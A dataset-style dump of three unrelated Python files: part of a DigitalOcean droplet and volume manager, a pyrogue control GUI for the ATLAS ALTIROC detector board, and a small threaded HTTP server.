f"Droplet id:{self.attributes.id} already has the maximum of 7 attached volumes"
)
# Volumes can only be attached to one droplet
##remove volume from other droplets first
target_volume.detach_from_droplets()
response = self.volumeapi.attach_volume_to_droplet(
target_volume.attributes.id, self.attributes.id,self.attributes.region['slug']
)
if response:
content = json.loads(response.content.decode("utf-8"))
action_data = dict(content["action"])
newaction=Action(ActionAttributes(**action_data))
self.action_manager.wait_for_action_completion(newaction)
self.lastaction=newaction
self.update()
target_volume.update()
def detach_a_volume(self, target_volume:Volume):
target_volume.detach_from_droplets()
self.update()
target_volume.update()
if __name__ == "__main__":
dmanager = DropletManager()
# a_droplet = dmanager.create_new_droplet(
# name="example.com",
# region="nyc3",
# size="s-1vcpu-1gb",
# image="ubuntu-16-04-x64",
# ssh_keys=[],
# backups=False,
# ipv6=True,
# user_data=None,
# private_networking=None,
# volumes=None,
# tags=["banabas"],
# )
# while not a_droplet.attributes.status == "active":
# time.sleep(5)
# print("waiting")
# print("-----arguments-----")
# print(a_droplet.arguments)
# print("-------ATTRIBUTES-------------")
# print(a_droplet.attributes)
## try:
# newdroplet = dmanager.retrieve_droplet_by_id(2496119371)
# except DropletNotFound:
# print("Droplet wasnt found")
# print(newdroplet.attributes)
# print(newdroplet.arguments)
# 249699371
# droplets = dmanager.retrieve_all_droplets_by_tag("banabas")
# for droplet in droplets:
# print(f"Deleteing droplet with id {droplet.attributes.id}")
# dmanager.delete_droplet(droplet)
# print(dmanager.does_droplet_id_exist(249699371))
# dmanager.delete_droplets_by_tag("banabas")
droplets = dmanager.retrieve_droplets_by_name("example.com")
for droplet in droplets:
print(droplet.attributes.name)
droplet.powercycle()
while (droplet.lastaction.status == None) or (
droplet.lastaction.status == "in-progress"
):
time.sleep(5)
print("waiting for action...")
print(droplet.lastaction)
print("finished")
|
DevGui.py
|
#!/usr/bin/env python3
##############################################################################
## This file is part of 'ATLAS ALTIROC DEV'.
## It is subject to the license terms in the LICENSE.txt file found in the
## top-level directory of this distribution and at:
## https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
## No part of 'ATLAS ALTIROC DEV', including this file,
## may be copied, modified, propagated, or distributed except according to
## the terms contained in the LICENSE.txt file.
##############################################################################
import sys
import rogue
import pyrogue as pr
import pyrogue.gui
import argparse
import common as feb
import time
import threading
#################################################################
Keep_display_alive = True
Live_display_interval = 1
#################################################################
def runLiveDisplay(event_display,fpga_index):
while(Keep_display_alive):
event_display.refreshDisplay()
time.sleep(Live_display_interval)
#################################################################
# Set the argument parser
parser = argparse.ArgumentParser()
# Convert str to bool
argBool = lambda s: s.lower() in ['true', 't', 'yes', '1']
# Add arguments
parser.add_argument(
"--ip",
nargs ='+',
required = True,
help = "List of IP addresses",
)
parser.add_argument(
"--pollEn",
type = argBool,
required = False,
default = True,
help = "Enable auto-polling",
)
parser.add_argument(
"--initRead",
type = argBool,
required = False,
default = True,
help = "Enable read all variables at start",
)
parser.add_argument(
"--loadYaml",
type = argBool,
required = False,
default = True,
help = "Enable loading of the defaults at start",
)
parser.add_argument(
"--defaultFile",
type = str,
required = False,
default = 'config/defaults.yml',
help = "default configuration file to be loaded before user configuration",
)
parser.add_argument(
"--userYaml",
nargs ='+',
required = False,
default = [''],
help = "List of board specific configurations to be loaded after defaults",
)
parser.add_argument(
"--refClkSel",
nargs ='+',
required = False,
default = ['IntClk'],
help = "Selects the reference input clock for the jitter cleaner per FPGA \
PLL: IntClk = on-board OSC, ExtSmaClk = 50 Ohm SMA Clock, ExtLemoClk = 100Ohm diff pair Clock",
)
parser.add_argument(
"--printEvents",
type = argBool,
required = False,
default = False,
help = "prints the stream data event frames",
)
parser.add_argument(
"--liveDisplay",
type = argBool,
required = False,
default = False,
help = "Displays live plots of pixel information",
)
# Get the arguments
args = parser.parse_args()
#################################################################
# Setup root class
print(args.ip)
top = feb.Top(
ip = args.ip,
pollEn = args.pollEn,
initRead = args.initRead,
loadYaml = args.loadYaml,
defaultFile = args.defaultFile,
userYaml = args.userYaml,
refClkSel = args.refClkSel,
)
# Create the Event reader streaming interface
if (args.printEvents):
eventReader = feb.PrintEventReader()
# Connect the file reader to the event reader
pr.streamTap(top.dataStream[0], eventReader)
# Create Live Display
live_display_resets = []
if args.liveDisplay:
for fpga_index in range( top.numEthDev ):
# Create the fifo to ensure there is no back-pressure
fifo = rogue.interfaces.stream.Fifo(100, 0, True)
# Connect the device reader ---> fifo
pr.streamTap(top.dataStream[fpga_index], fifo)
# Create the pixelreader streaming interface
event_display = feb.onlineEventDisplay(
plot_title='FPGA ' + str(fpga_index),
submitDir='display_snapshots',
font_size=4,
fig_size=(10,6),
overwrite=True )
live_display_resets.append( event_display.reset )
# Connect the fifo ---> stream reader
pr.streamConnect(fifo, event_display)
# Retrieve pixel data streaming object
display_thread = threading.Thread( target=runLiveDisplay, args=(event_display,fpga_index,) )
display_thread.start()
top.add_live_display_resets(live_display_resets)
# Create GUI
appTop = pr.gui.application(sys.argv)
guiTop = pr.gui.GuiTop()
appTop.setStyle('Fusion')
guiTop.addTree(top)
guiTop.resize(600, 800)
print("Starting GUI...\n");
# Run GUI
appTop.exec_()
# Close
Keep_display_alive = False
top.stop()
exit()
|
httpserver.py
|
#!/usr/bin/python
# -*-coding: utf8 -*-
import threading
from BaseHTTPServer import HTTPServer
from SocketServer import ThreadingMixIn
from httpserverhandler import HttpServerHandler
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
class HttpServer():
def __init__(self):
pass
def run(self, port_number):
threading.Thread(target=self.run_internal, args=[port_number]).start()
@staticmethod
def run_internal(port_number):
try:
server = ThreadedHTTPServer(('', port_number), HttpServerHandler)
print 'Started httpserver on port ', server.server_port
server.serve_forever()
except KeyboardInterrupt:
print '^C received, shutting down the web server'
server.socket.close()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.